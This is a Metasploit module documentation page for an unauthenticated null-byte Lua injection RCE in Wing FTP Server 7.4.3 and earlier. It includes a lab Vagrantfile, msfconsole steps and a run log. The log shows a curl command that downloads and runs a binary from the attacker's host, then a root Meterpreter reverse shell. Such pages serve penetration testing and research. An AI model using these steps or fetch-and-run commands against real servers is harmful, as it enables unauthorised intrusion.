adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
5ad5384b7fc5ac403ea8dfdb4921f032e349de13
metasploit-gs/documentation/modules/exploit/multi/http/wingftp_null_byte_rce.md
T
cgranleese-r7 469f102596 Updates docs to reflect new default prompt
2025-07-17 09:53:40 +01:00

4.9 KiB
Raw Blame History

Vulnerable Application

This Metasploit module exploits an unauthenticated Remote Code Execution vulnerability in Wing FTP Server (≤ 7.4.3 on Linux 64-bit), via its web administration interface. The flaw lies in the login handler (loginok.html): by injecting a null byte (%00) into the username parameter, attacker-supplied Lua code is written into the session file and then executed by loadfile(), yielding arbitrary code execution as root.

To set up a vulnerable lab, use the following Vagrantfile, which provisions a Debian "bookworm" VM, installs Wing FTP Server 7.4.3, and exposes its HTTP/S and FTP ports on the host:

Vagrant.configure("2") do |config|
  config.vm.box = "debian/bookworm64"

  if Vagrant.has_plugin?("vagrant-vbguest")
    config.vbguest.auto_update = false
  end

  {
    21    => 2121,   # FTP
    990   => 2990,   # FTPS
    5466  => 5466,   # Admin port WingFTP
    50000 => 50000,  # Passive FTP range start
    50050 => 50050,  # Passive FTP range end
    80    => 8081    # HTTP WingFTP Web GUI
  }.each do |guest, host|
    config.vm.network "forwarded_port",
                      guest:        guest,
                      host:         host,
                      host_ip:      "0.0.0.0",
                      auto_correct: true
  end

  config.vm.provision "shell", inline: <<-SHELL
#!/usr/bin/env bash
set -e

ADMIN_USER="admin"
ADMIN_PASS="adminadmin"
ADMIN_PORT="5466"
WFTP_URL="https://web.archive.org/web/20250108084555/https://www.wftpserver.com/download/wftpserver-linux-64bit.tar.gz"

apt-get update
DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
  wget ca-certificates libssl3 libpam0g libacl1 libcap2 \
  net-tools procps expect curl \
  linux-headers-amd64 build-essential dkms

mkdir -p /opt/wingftp
cd /opt/wingftp
wget -qO wftp.tar.gz "$WFTP_URL"
tar xzf wftp.tar.gz --strip-components=1
rm wftp.tar.gz
chmod +x setup.sh

expect -c "
  spawn /opt/wingftp/setup.sh
  expect \\\"Enter your administrator name:\\\"     { send \\\"${ADMIN_USER}\\r\\\" }
  expect \\\"Enter your administrator password:\\\" { send \\\"${ADMIN_PASS}\\r\\\" }
  expect \\\"Enter your administrator password:\\\" { send \\\"${ADMIN_PASS}\\r\\\" }
  expect \\\"Enter the listener port\\\"           { send \\\"${ADMIN_PORT}\\r\\\" }
  expect \\\"Do you want to start Wing FTP Server now?\\\" { send \\\"y\\r\\\" }
  expect eof
"

systemctl daemon-reload
systemctl enable wftpserver.service
systemctl start wftpserver.service
SHELL

  config.vm.provider "virtualbox" do |vb|
    vb.memory = 512
    vb.cpus   = 1
  end
end
  • Save this as Vagrantfile in an empty directory.
  • Run vagrant up.
  • After provisioning, access the Wing FTP Server web UI at http://localhost:5466/ with credentials admin/adminadmin.
  • On first login, a popup will appear; click OK.
  • Create a new domain in the admin interface (this will enable the web client panel, port 8081).
  • Then create a new user; for simplicity, use anonymous.

Verification Steps

  1. Start msfconsole.
  2. Load the module:
use exploit/multi/http/wingftp_null_byte_rce
  1. Set target parameters:
set RHOSTS 127.0.0.1
set RPORT 8081
set TARGETURI /
  1. Configure payload:
set payload cmd/linux/http/x64/meterpreter/reverse_tcp
set LHOST <your IP>
set LPORT <your port>
  1. Run the exploit:
run
  1. On success, a Meterpreter session will open, confirming remote code execution.

Options

USERNAME

A valid username (default: anonymous)

PASSWORD

A valid password (default: '')

Scenarios

Successful Exploitation against Wing FTP Server

Setup:

  • Wing FTP Server running in the Vagrant VM above.
  • Attacker on host machine with Metasploit.

Steps:

With cmd/linux/http/x64/meterpreter/reverse_tcp:

msf exploit(multi/http/wingftp_null_byte_rce) > run http://lab:8081
[*] Command to run on remote host: curl -so ./FaWVivODJhB http://192.168.1.36:9999/LoPlnjEpeOexZNVppn6cAA;chmod +x ./FaWVivODJhB;./FaWVivODJhB&
[*] Fetch handler listening on 192.168.1.36:9999
[*] HTTP server started
[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. UID cookie received: UID=2a5efb5a398e4ff19369a523c3cfffb03683e20446a6b40715757e2b05f10521
[+] Received UID: UID=146015b242094d8f4eff04941d94e67d3683e20446a6b40715757e2b05f10521
[*] Client 192.168.1.36 requested /LoPlnjEpeOexZNVppn6cAA
[*] Sending payload to 192.168.1.36 (curl/7.88.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.36
[*] Meterpreter session 7 opened (192.168.1.36:4444 -> 192.168.1.36:46260) at 2025-07-01 18:56:31 +0200

meterpreter > sysinfo 
Computer     : 10.0.2.15
OS           : Debian 12.9 (Linux 6.1.0-37-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
Reference in New Issue View Git Blame Copy Permalink